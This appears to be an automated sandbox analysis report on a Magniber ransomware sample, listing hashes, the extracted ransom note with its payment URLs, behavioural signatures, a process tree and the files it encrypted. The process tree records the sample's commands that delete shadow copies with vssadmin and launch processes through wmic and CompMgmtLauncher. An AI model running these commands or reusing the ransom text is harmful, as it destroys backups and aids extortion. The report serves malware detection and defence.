Analysis

  • max time kernel
    0s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    22-06-2021 14:06

General

  • Target

    3.exe

  • Size

    21KB

  • MD5

    4160c35d3c600712b528e8072de1bc58

  • SHA1

    12c822103678fed7b928f0202eb7e51714ab3b56

  • SHA256

    f2ab74ce11c4462db427db65ff5755db4d5267d373172384a241017150e14675

  • SHA512

    f722f7a5560641b0cbeb73dfb9d495cf2920858acfdcd5806f619256f2810569486be00eee4547b07298ca20c18d478f3f567809a7b2ff9cf81519e057a3a962

Score
10/10

Malware Config

Extracted

Path

C:\Users\Public\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!
====================================================================================================
Your files are NOT damaged! Your files are modified only. This modification is reversible.
The only 1 way to decrypt your files is to receive the private key and decryption program.
Any attempts to restore your files with the third party software will be fatal for your files!
====================================================================================================
To receive the private key and decryption program follow the instructions below:
1. Download "Tor Browser" from https://www.torproject.org/ and install it.
2. In the "Tor Browser" open your personal page here: http://7a3876288814c040d0lqcsthxnw.ndkeblzjnpqgpo5o.onion/lqcsthxnw
Note! This page is available via "Tor Browser" only.
====================================================================================================
Also you can use temporary addresses on your personal page without using "Tor Browser":
http://7a3876288814c040d0lqcsthxnw.wonride.site/lqcsthxnw
http://7a3876288814c040d0lqcsthxnw.lognear.xyz/lqcsthxnw
http://7a3876288814c040d0lqcsthxnw.lieedge.casa/lqcsthxnw
http://7a3876288814c040d0lqcsthxnw.bejoin.space/lqcsthxnw
Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://7a3876288814c040d0lqcsthxnw.ndkeblzjnpqgpo5o.onion/lqcsthxnw

http://7a3876288814c040d0lqcsthxnw.wonride.site/lqcsthxnw

http://7a3876288814c040d0lqcsthxnw.lognear.xyz/lqcsthxnw

http://7a3876288814c040d0lqcsthxnw.lieedge.casa/lqcsthxnw

http://7a3876288814c040d0lqcsthxnw.bejoin.space/lqcsthxnw

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

  • Process spawned unexpected child process 9 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Suspicious use of SetThreadContext 3 IoCs
  • Interacts with shadow copies 2 TTPs 4 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    PID:1228
      • C:\Users\Admin\AppData\Local\Temp\3.exe
        "C:\Users\Admin\AppData\Local\Temp\3.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        PID:484
          • C:\Windows\system32\cmd.exe
            cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
            3⤵
            PID:364
              • C:\Windows\system32\wbem\WMIC.exe
                C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
                4⤵
                PID:524
          • C:\Windows\system32\cmd.exe
            cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
            3⤵
            PID:676
              • C:\Windows\system32\wbem\WMIC.exe
                C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
                4⤵
                PID:752
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
        PID:1244
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
            3⤵
            PID:1640
  • C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    1⤵
    PID:1180
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
        PID:1284
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
            3⤵
            PID:320
  • C:\Windows\system32\taskhost.exe
    "taskhost.exe"
    1⤵
    PID:1120
      • C:\Windows\system32\notepad.exe
        notepad.exe C:\Users\Public\readme.txt
        2⤵
        • Opens file in notepad (likely ransom note)
        PID:1952
      • C:\Windows\system32\cmd.exe
        cmd /c "start http://7a3876288814c040d0lqcsthxnw.wonride.site/lqcsthxnw^&1^&27711471^&80^&343^&12"
        2⤵
        PID:1740
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" http://7a3876288814c040d0lqcsthxnw.wonride.site/lqcsthxnw&1&27711471&80&343&12
            3⤵
            PID:1788
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1788 CREDAT:275457 /prefetch:2
                4⤵
                PID:2180
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
        PID:1776
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
            3⤵
            PID:1212
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    PID:2092
      • C:\Windows\system32\CompMgmtLauncher.exe
        CompMgmtLauncher.exe
        2⤵
        PID:2228
          • C:\Windows\system32\wbem\wmic.exe
            "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
            3⤵
            PID:2468
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    PID:2084
      • C:\Windows\system32\CompMgmtLauncher.exe
        CompMgmtLauncher.exe
        2⤵
        PID:2264
          • C:\Windows\system32\wbem\wmic.exe
            "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
            3⤵
            PID:2540
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    PID:2076
      • C:\Windows\system32\CompMgmtLauncher.exe
        CompMgmtLauncher.exe
        2⤵
        PID:2276
          • C:\Windows\system32\wbem\wmic.exe
            "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
            3⤵
            PID:2432
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    PID:2068
      • C:\Windows\system32\CompMgmtLauncher.exe
        CompMgmtLauncher.exe
        2⤵
        PID:2204
          • C:\Windows\system32\wbem\wmic.exe
            "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
            3⤵
            PID:2400
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    PID:2060
      • C:\Windows\system32\CompMgmtLauncher.exe
        CompMgmtLauncher.exe
        2⤵
        PID:2220
          • C:\Windows\system32\wbem\wmic.exe
            "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
            3⤵
            PID:2484
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:2692
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    PID:2752
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:2772
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:2780
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:2828

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\T3AA9KV2.txt
  • C:\Users\Admin\Desktop\CompressAssert.svgz.lqcsthxnw
  • C:\Users\Admin\Desktop\EnableStart.ppsx.lqcsthxnw
  • C:\Users\Admin\Desktop\FindInvoke.asp.lqcsthxnw
  • C:\Users\Admin\Desktop\InvokeRedo.tiff.lqcsthxnw
  • C:\Users\Admin\Desktop\ProtectWatch.rar.lqcsthxnw
  • C:\Users\Admin\Desktop\ResumeNew.odt.lqcsthxnw
  • C:\Users\Admin\Desktop\ResumeRename.vstx.lqcsthxnw
  • C:\Users\Admin\Desktop\SuspendTrace.emf.lqcsthxnw
  • C:\Users\Admin\Desktop\SyncDeny.rar.lqcsthxnw
  • C:\Users\Admin\Desktop\TraceFormat.pot.lqcsthxnw
  • C:\Users\Admin\Desktop\WriteJoin.rar.lqcsthxnw
  • C:\Users\Admin\Desktop\readme.txt
  • C:\Users\Public\readme.txt
  • \??\PIPE\srvsvc